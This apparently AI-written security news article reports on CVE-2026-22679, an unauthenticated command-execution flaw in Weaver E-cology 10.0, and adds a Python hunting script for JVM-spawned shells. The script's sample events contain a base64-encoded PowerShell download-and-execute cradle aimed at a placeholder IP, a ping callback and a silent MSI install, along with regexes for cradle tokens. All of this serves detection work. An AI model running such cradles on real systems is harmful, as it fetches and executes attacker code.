Ethical Hacking News
Weaver E-cology, a widely used enterprise office automation and collaboration platform, has been hit by a critical vulnerability that has been exploited in attacks since mid-March. The flaw is an exposed debug API endpoint that lets unauthenticated attackers execute arbitrary system commands on the server, with no input validation in the way. The security update released by the vendor is the recommended fix for users of Weaver E-cology 10.0.
- Vulnerability CVE-2026-22679 discovered in Weaver E-cology 10.0, allowing remote code execution (RCE) without authentication or input validation.
- Attackers exploited an exposed debug API endpoint to execute system commands on the server.
- Initial phase involved ping command checks and PowerShell payload downloads, which were blocked by endpoint defenses.
- Attackers reverted to the RCE endpoint and used obfuscated, fileless PowerShell to fetch remote scripts.
- No persistent session was established on the targeted host; the security update removes the debug endpoint and is the recommended fix.
Weaver E-cology, a popular enterprise office automation and collaboration platform used by Chinese organizations, has been hit by a critical bug that has been exploited in attacks since mid-March. The vulnerability, identified as CVE-2026-22679, is a remote code execution (RCE) flaw that affects E-cology 10.0 builds prior to March 12.
The attack vector involves an exposed debug API endpoint that allows user-supplied parameters to reach backend Remote Procedure Call (RPC) functionality without authentication or input validation. This enables attackers to pass crafted values that are ultimately executed as system commands on the server, effectively turning the endpoint into a remote command execution interface.
According to threat intelligence company Vega, which documented the malicious activity and reported it publicly two weeks after the attacks began, the initial phase of the attack involved confirming RCE by triggering ping commands from the Java process to a Goby-linked callback host. The attackers then attempted multiple PowerShell-based payload downloads, which were blocked by endpoint defenses.
The next phase saw the attackers attempting to deploy a target-aware MSI installer (fanwei0324.msi), which failed to execute properly and did not lead to any further activity. After this failed attempt, the attackers reverted to the RCE endpoint and used obfuscated and fileless PowerShell to repeatedly fetch remote scripts throughout all attack phases.
Throughout all phases of the attack, the threat actors executed reconnaissance commands such as whoami, ipconfig, and tasklist. It's worth noting that although the attackers repeatedly ran commands through the CVE-2026-22679 vulnerability, they never established a persistent session on the targeted host.
The security update released by the vendor, which removes the debug endpoint entirely, is the recommended fix for users of Weaver E-cology 10.0. As the official bulletin notes, there are no alternative mitigations or workarounds available.
Vega highlights that the attackers' commands run as child processes of java.exe (Weaver's Tomcat-bundled Java Virtual Machine), with no preceding authentication, which makes a shell or PowerShell process parented by the JVM the most useful detection signal for this activity. The vendor fix (build 20260312) removes the debug endpoint entirely.
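The following is an added hunting example written for this article; it is not code from Vega, Weaver, or the original report. It turns the observed pattern (a cmd.exe, powershell.exe or msiexec.exe process whose parent is java.exe, running whoami/ipconfig/tasklist, a ping callback, an MSI launch, or an encoded fileless PowerShell cradle) into detection logic over process-creation records. The records are constructed to resemble Sysmon Event ID 1 fields; the file paths, callback hostname, and download URL are assumptions, not indicators from the incident.

```python
"""Hunt process-creation events for the pattern described in the article:
a shell, PowerShell or msiexec process parented by the Weaver E-cology Tomcat
JVM (java.exe) whose command line shows reconnaissance, a ping callback, an
MSI launch, or an encoded/fileless PowerShell download cradle.
The events below are constructed to resemble Sysmon Event ID 1 records; they
are illustrative, not logs from the incident."""
import base64
import re

# Hypothetical PowerShell cradle, base64-encoded the way -EncodedCommand
# expects (UTF-16LE). The URL is a documentation address, not a real IoC.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed sample input; paths and hosts are assumptions
    {"EventID": 1, "ParentImage": r"C:\Weaver\jdk\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ping -n 1 abc123.callback.example"},
    {"EventID": 1, "ParentImage": r"C:\Weaver\jdk\bin\java.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"EventID": 1, "ParentImage": r"C:\Weaver\jdk\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1, "ParentImage": r"C:\Weaver\jdk\bin\java.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Windows\Temp\fanwei0324.msi /qn"},
    # Benign: the JVM may legitimately spawn helpers that are not shells.
    {"EventID": 1, "ParentImage": r"C:\Weaver\jdk\bin\java.exe",
     "Image": r"C:\Weaver\ecology\bin\convert.exe",
     "CommandLine": "convert.exe report.docx report.pdf"},
    # Benign: the same recon command from an interactive session is noise here.
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]

SUSPECT_PARENT = "java.exe"
SUSPECT_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "msiexec.exe"}
RECON_COMMANDS = {"whoami", "ipconfig", "tasklist", "ping"}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")
# Tokens typical of fileless download-and-execute cradles
CRADLE_RE = re.compile(
    r"(?i)\b(?:IEX|Invoke-Expression|DownloadString|DownloadFile|"
    r"Invoke-WebRequest|Net\.WebClient|FromBase64String)\b")


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict) -> list:
    """Reasons this event matches the pattern; an empty list means not flagged."""
    if event.get("EventID") != 1 or basename(event.get("ParentImage", "")) != SUSPECT_PARENT:
        return []
    child = basename(event.get("Image", ""))
    if child not in SUSPECT_CHILDREN:
        return []
    reasons = [f"{child} spawned by {SUSPECT_PARENT}"]
    cmd = event.get("CommandLine", "")
    tokens = {basename(t) for t in re.split(r"\s+", cmd) if t}
    for recon in sorted(RECON_COMMANDS & tokens):
        reasons.append(f"reconnaissance/callback command: {recon}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    # Look for cradle tokens both in the raw line and in the decoded payload.
    for text in (cmd, decoded or ""):
        if CRADLE_RE.search(text):
            reasons.append("fileless download cradle")
            break
    if child == "msiexec.exe" and ".msi" in cmd.lower():
        reasons.append("MSI package launched from the JVM")
    return reasons


def hunt(events) -> list:
    """Return (index, reasons) for every flagged event."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]


if __name__ == "__main__":
    for i, reasons in hunt(SAMPLE_EVENTS):
        print(f"event {i}: " + "; ".join(reasons))
```

The parent-process check does the heavy lifting: whoami or an encoded PowerShell command from an interactive session is ordinary admin noise, but the same command line with java.exe as the parent on an E-cology server has no legitimate explanation and should page someone. Decoding the -EncodedCommand argument before matching is what lets the rule see the download cradle the obfuscation is meant to hide.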
In light of this attack, it's essential for users of Weaver E-cology 10.0 to apply the security update available through the vendor's site as soon as possible.
Related Information:
https://www.ethicalhackingnews.com/articles/Weaver-E-cology-Critical-Bug-Exploited-in-Attacks-Since-March-ehn.shtml
https://www.bleepingcomputer.com/news/security/weaver-e-cology-critical-bug-exploited-in-attacks-since-march/
https://www.radarbytes.com/en/noticia/critical-alert-cve-2026-22679-at-weaver-e-cology-exposes-a-debugging-endpoint-and-allows-remote-command-execution-910
https://nvd.nist.gov/vuln/detail/CVE-2026-22679
https://www.cvedetails.com/cve/CVE-2026-22679/
Published: Mon May 4 18:30:32 2026 by llama3.2 3B Q4_K_M